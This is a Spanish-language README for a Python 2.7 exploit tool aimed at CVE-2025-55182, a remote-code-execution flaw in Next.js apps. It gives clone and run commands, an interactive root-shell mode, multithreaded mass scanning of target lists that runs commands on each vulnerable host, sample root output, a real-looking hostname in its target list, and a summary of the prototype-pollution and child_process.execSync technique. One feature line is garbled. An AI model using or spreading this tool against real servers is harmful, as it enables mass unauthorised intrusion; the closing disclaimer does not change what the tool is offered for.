
CVE-2025-55182 Herramienta de Explotación – Exploit en Python 2.7 para contaminación de prototipos en Next.js que conduce a RCE
Un exploit en Python 2.7 para CVE-2025-55182 – una vulnerabilidad crítica de contaminación de prototipos / RCE en aplicaciones Next.js.
Esta herramienta permite tanto shell interactivo para un solo objetivo como escaneo masivo de múltiples hosts con subprocesos múltiples, salida colorida y respaldo HTTPS automático.
https:// si no se proporciona protocoloid predeterminado por cualquier comando (whoami, ls, etc.)requests (fácil de instalar)requests – instala con:
pip install requests
· Un terminal que soporte colores ANSI (la mayoría de terminales Linux/macOS, Windows Terminal, PowerShell)
📦 Instalación
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
Haz el script ejecutable (opcional):
chmod +x CVE-2025-55182.py
🎯 Uso
python2 CVE-2025-55182.py https://target.com
o sin protocolo (se agrega HTTPS automáticamente):
python2 CVE-2025-55182.py target.com
Una vez conectado y verificado como vulnerable, obtienes un prompt de shell:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
Comandos integrados:
· exit / quit – cerrar shell · clear – limpiar pantalla · help – mostrar ayuda
Prepara un archivo con un objetivo por línea (con o sin http/https):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
Ejecuta escaneo masivo (por defecto: 10 hilos, comando id, salida res.txt):
python2 CVE-2025-55182.py targets.txt
Personaliza hilos, comando, archivo de salida:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
· 20 – número de hilos · whoami – comando a ejecutar en cada objetivo vulnerable · results.txt – archivo de salida (solo se guardan las entradas vulnerables)
Ejemplo de salida de escaneo masivo:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
Resultados guardados (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
🧪 Cómo funciona
El exploit envía una solicitud multipart/form-data manipulada a un endpoint de Next.js (se agrega /login si la ruta está vacía).
Abusa de la contaminación de prototipos (__proto__:then y constructor:constructor) para inyectar un prefijo malicioso que ejecuta un comando del sistema usando child_process.execSync().
El servidor responde con una redirección 303 que contiene la salida del comando en el encabezado x-action-redirect (o Location). La herramienta extrae el resultado de /login?a=<output>.
🛡️ Descargo de responsabilidad
Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas.
El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso o daño causado por este software.
Debes tener permiso explícito por escrito del propietario del sistema objetivo antes de usar este exploit.
Puedes ver más descargos en la portada de Jenderal92. Puedes consultarlo ¡AQUÍ!